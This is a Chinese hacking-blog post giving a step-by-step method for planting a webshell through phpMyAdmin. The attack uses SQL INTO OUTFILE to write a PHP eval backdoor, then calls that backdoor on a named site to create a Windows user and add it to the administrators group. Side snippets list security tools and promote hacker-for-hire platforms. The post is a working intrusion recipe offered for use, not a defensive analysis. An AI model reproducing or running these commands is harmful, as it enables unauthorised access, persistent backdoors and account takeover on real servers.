利用phpMyAdmin拿webshell

hacker4年前 (2020-05-31)黑客文章621

首先用暴路径漏洞找到绝对路径，然后替换下面的路径

随便选个数据库，然后执行以下的sql（利用sql命令导出一个shell）

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php @eval($_POST[cmd])?>’);
select cmd from a into outfile ‘D:\www\dmtz\bbs\upload\phpmyadmin\eval.php‘;
Drop TABLE IF EXISTS a;

这是我们的后门

http://chncto.com/phpmyadmin/eval.php

加个系统帐号
http://chncto.com/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://chncto.com/phpmyadmin/eval.php?cmd=net localgroup administrators test /add

标签: 黑客技术

返回列表

上一篇：绕过安全狗用户限制提权

下一篇：aspcms后台拿shell的两种方法

社会发展技术工程师工具箱

Social Engineer Toolkit 翻译中文可称：社会发展技术工程师工具箱；什么是社会技术工程师工具箱？由TrustedSec的创办人编写，社交媒体技术工程师工具箱（S...

Truecrypt是不是适用全部电脑操作系统?

什么叫Truecrypt？ TrueCrypt在2017年五月淘汰以前是一款出色的开源系统磁盘加密系统软件。客户能够根据键入客户建立的登陆密码语句来对其全部系统文件开展数据加密。它还具备容许客户掩...

P0f的典型性主要用途是啥?

什么叫P0f？ p0f是一种处于被动指纹验证专用工具，能够鉴别您联接的设备，联接到您的小盒子的设备，乃至联接在小盒子周边的设备，即便该机器设备坐落于数据文件服务器防火墙后边。 P0f...

Nikto网址漏洞扫描器

什么叫Nikto网址漏洞扫描器？一个开源系统的Web服务端扫描枪，Nikto对超出6700个潜在性的风险文档开展检测，并在Web服务端上程序执行。它还致力于查验超出1250个落伍的网络服务器版本号...

黑客入侵电脑的方法_黑客怎样入侵别人的电脑

我们经常听到说黑客做什么事情了，又入侵哪个网站了，或者听说黑客进入谁的电脑了，窃取别人电脑的什么资料了，等等。黑客对于我们来说有些神秘。黑客怎样入侵别人的电脑的呢？下面的4点让您对黑客入侵有一定的...

黑客接单网站，黑客接单的平台有哪些

卡利Linux操作系统。该操作系统是基于Debian版本的系统，可用于数字取证和渗透测试。该系统由攻击性安全公司开发和保护。只有马蒂·阿哈罗尼(Mati Aharoni)和德文·卡恩斯(Devon K...

找黑客平台